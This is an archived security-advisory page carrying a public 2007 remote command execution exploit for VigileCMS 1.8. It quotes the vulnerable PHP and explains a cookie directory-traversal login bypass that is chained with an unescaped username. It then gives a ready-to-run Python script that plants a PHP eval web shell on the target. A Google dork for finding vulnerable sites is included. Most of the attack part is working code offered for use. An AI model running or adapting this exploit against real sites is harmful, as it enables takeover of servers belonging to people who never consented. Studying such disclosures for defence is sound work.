TUCoPS :: Web :: CMS / Portals :: tb13538.htm

VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit



Opencosmo Security=0D
http://www.opencosmo.com=0D 
http://www.opencosmo.com/news.php?readmore=15=0D 
=0D
=0D
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit=0D
Crediti: The:Paradox=0D
Applicazione: VigileCMS=0D
Versione: 1.8=0D
Impatto: Remote Command Execution=0D
Rischio: [3/5]=0D
=0D
Exploit: #!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
'''=0D
_ _ _=0D
| |_| |_ ___ _ _ __ __ _ _ _ __ _ __| |_____ __=0D
| _| ' \/ -_)|_|| '_ \/ _` | '_/ _` / _` / _ \ \ /=0D
\__|_||_\___||_|| .__/\__,_|_| \__,_\__,_\___/_\_\=0D
|_|=0D
------------------------------------------------------------------------------------------------=0D
This is a Public Exploit. 22/10/2007 (dd-mm-yyyy)=0D
------------------------------------------------------------------------------------------------=0D
=C2=A7 0day VigileCMS 1.8 Stealth and maybe lower version - Remote Command Execution =C2=A7=0D
Vendor: http://www.vigilenapoletano.it=0D 
Severity: Highest=0D
Author: The:Paradox=0D
Italy r0x.=0D
=0D
Visit inj3ct-it.org=0D
=0D
Comments: This exploit was coded to show some people what a real vulnerability is.=0D
------------------------------------------------------------------------------------------------=0D
Related Codes:=0D
=0D
--- index.php; line 64:=0D
=0D
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {=0D
if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){=0D
$_SESSION[user] = $_COOKIE[rem_user];=0D
$_SESSION[pass] = $_COOKIE[rem_pass];=0D
logthis("$_SESSION[user] si =C3=A8 collegato al Sito: riconosciuto con Cookie!");=0D
UserVisita ();// aggiornamento database utente per numero di visite=0D
}=0D
}=0D
=0D
--- func.inc.php; line 93:=0D
=0D
function is_admin(){ //## FUNCTION ##=0D
if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- func.inc.php; line 109:=0D
=0D
function is_superadmin(){ //## FUNCTION ##=0D
include (LOGS_TAB."/creazione.php");=0D
if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- vedipm.php; line 210:=0D
=0D
if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";=0D
=0D
$_POST[ttl] =stripslashes($_POST[ttl]);=0D
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e maligni tipo javascript=0D
$_POST[cont]=stripslashes($_POST[cont]);=0D
$_POST[cont]=htmlspecialchars($_POST[cont]); // impedisce visualizzazioni caratteri html e maligni tipo javascript=0D
$_POST[cont]=str_replace("\r\n","[br]",$_POST[cont]);=0D
$_POST[cont]=str_replace("<~>","<|>",$_POST[cont]);=0D
$_POST[ttl]=str_replace("<~>","<|>",$_POST[ttl]);=0D
=0D
$time = time();=0D
=0D
$newpm = fopen (PM_TAB."/$_POST[to]", "a");=0D
fwrite ($newpm, "$_POST[ttl]<~>$_POST[cont]<~>$_SESSION[user]<~>$time<~>non_letto\r\n");=0D
fclose($newpm);=0D
------------------------------------------------------------------------------------------------=0D
Bug Explanation:=0D
=0D
The platform presents some vulnerabilities in the "login system" and in the "private message sender system".=0D
The first vulnerability is in index.php that verifies the login without sql database verifying the existence of files with the structure Nick.HashMD5Password.php in a dir "db".=0D
The cms'coder didn't thought about directory transversal. In fact if we try to login with these cookies:=0D
=0D
rem_user = /../users/Nick=0D
rem_pass = HashMD5Password=0D
=0D
Where Nick and HashMD5Password are an existent UserName and MD5 Password's Hash, we'll gain administration rights. This happens because the "function is_admin" will check the file existence of /db/admin/../users/Nick.HashMD5Password.php=0D
Obvious this may work with any file (with some collateral errors because it missed an include :P)=0D
Whatever this doesn't make us able to do a lot of action in control panel because we will not have superadmin rights (see is_superadmin() function)=0D
The second vulnerability is in vedipm.php and make us able to write a file on the server, but we can't get a RCE because our action are limited by htmlspecialchars that changes characters of php code (< >). Whatever $_SESSION[user] is not htmlspecialcharsed.=0D
Using the first and the second vulnerability we can gain a RCE. We will create a "file named with php code" , with this we'll login and get an evil $_SESSION[user] that will be written in a php file.=0D
------------------------------------------------------------------------------------------------=0D
A lot of other Vulnerabilities have been found in this platform, but their functionality depends by the configuration OFF of MAGIC QUOTES or other uses of vulnerabilities I explained , so they were not published.=0D
------------------------------------------------------------------------------------------------=0D
Google Dork-> Powered by Cms Vigile=0D
------------------------------------------------------------------------------------------------=0D
Use this exploit at your own risk. You are responsible for your own deeds.=0D
Not tested on version < of 1.6=0D
------------------------------------------------------------------------------------------------=0D
Use your brain, do not lame. Enjoy. =)=0D
'''=0D
#Python exploit starts:=0D
=0D
import sys, httplib, urllib=0D
print ""=0D
if len(sys.argv)<=1:=0D
=0D
print "################################################"=0D
print " VigileCMS <= 1.8 Stealth "=0D
print " Remote Command Execution "=0D
print " "=0D
print " Discovered By The:Paradox "=0D
print " "=0D
print " Usage: "=0D
print " %s [Target] [Path] " % (sys.argv[0])=0D
print " "=0D
print " Example: "=0D
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])=0D
print " "=0D
print " You may have to set other options in the "=0D
print " code, like port if it isn't 80 "=0D
print " or options for old viglecms' versions. "=0D
print " "=0D
print "################################################\n"=0D
sys.exit()=0D
else:=0D
print "################################################"=0D
print " VigileCMS <= 1.8 Stealth "=0D
print " Remote Command Execution "=0D
print " "=0D
print " Discovered By The:Paradox "=0D
print " "=0D
print " Usage: "=0D
print " %s [Target] [Path] " % (sys.argv[0])=0D
print " "=0D
print " Example: "=0D
print " python %s 127.0.0.1 /vigilecms/ " % (sys.argv[0])=0D
print " "=0D
print " You may have to set other options in the "=0D
print " code, like port if it isn't 80 "=0D
print " or options for old viglecms' versions. "=0D
print " "=0D
print "################################################\n"=0D
print "[.]Exploit Starting. "=0D
#Some Vars=0D
old = 0 #set to 1 if you are trying to exploit a 1.6 vigile cms version=0D
port = 80=0D
db = "db" #Directory of database=0D
target = sys.argv[1]=0D
try:directory = sys.argv[2]=0D
except IndexError:directory = "/"=0D
#Starting=0D
try:=0D
#Verifing /db/index.php=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("GET", "%sdb/index.php" % (directory))=0D
r1 = conn.getresponse()=0D
print "Verifing existence of-> %s%s%s/index.php" % (target,directory,db),r1.status, r1.reason=0D
if r1.status == 404:=0D
sys.exit("[-]/db/index.php not found (404). Aborted.")=0D
conn.close()=0D
#Verifing /pm/index.php=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("GET", "%sdb/pm/index.php" % (directory))=0D
r1 = conn.getresponse()=0D
print "Verifing existence of-> %s%s%s/pm/index.php" % (target,directory,db),r1.status, r1.reason=0D
if r1.status == 404:=0D
sys.exit("[-]/db/pm/index.php not found (404). Aborted.")=0D
=0D
except httplib.ResponseNotReady:=0D
sys.exit("[-]ResponseNotReady. Aborted.")=0D
=0D
if old == 1:=0D
pt = "/"=0D
pt2 = "?"=0D
else:=0D
pt = "?"=0D
pt2 = "&"=0D
=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})=0D
response = conn.getresponse()=0D
print "[.]Doing Post Connection #1 -->",response.status, response.reason=0D
conn.close()=0D
=0D
conn = httplib.HTTPConnection(target,port)=0D
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': '../igotyourbox.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F%3C%3Fphp+eval(stripslashes(%24_GET%5Bdox%5D))%3B+%3F%3E; rem_pass=paradox-got-this-one;","Content-type": "application/x-www-form-urlencoded"})=0D
response = conn.getresponse()=0D
print "[.]Doing Post Connection #2 -->",response.status, response.reason=0D
conn.close()=0D
try:=0D
=0D
conn = httplib.HTTPConnection(target,port)=0D
path = "%s%s/igotyourbox.php" % (directory,db)=0D
conn.request("GET", path)=0D
r1 = conn.getresponse()=0D
conn.close()=0D
except httplib.ResponseNotReady:=0D
sys.exit("[-]ResponseNotReady. Aborted.")=0D
=0D
print "[.]Verifing Exploit Success..."=0D
if r1.status == 404:=0D
sys.exit("[-]Exploit Failed.")=0D
else:=0D
print "[+]Done.\n[+]Removing the page..."=0D
conn = httplib.HTTPConnection(target,port)=0D
path = directory + "db/igotyourbox.php?dox=unlink('%3C?php%20eval(stripslashes($_GET[dox]));%20?%3E.paradox-got-this-one.php');"=0D
conn.request("GET", path)=0D
print "[+]Success :D Exploited.\n\n A PHP Page Has Been Created -> %s%s%s/igotyourbox.php \n With Content:\n \n Execute your php codes :P Have Fun :D\n\n-= Paradox Got This One :D =-\n" % (target,directory,db)=0D
=0D
Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH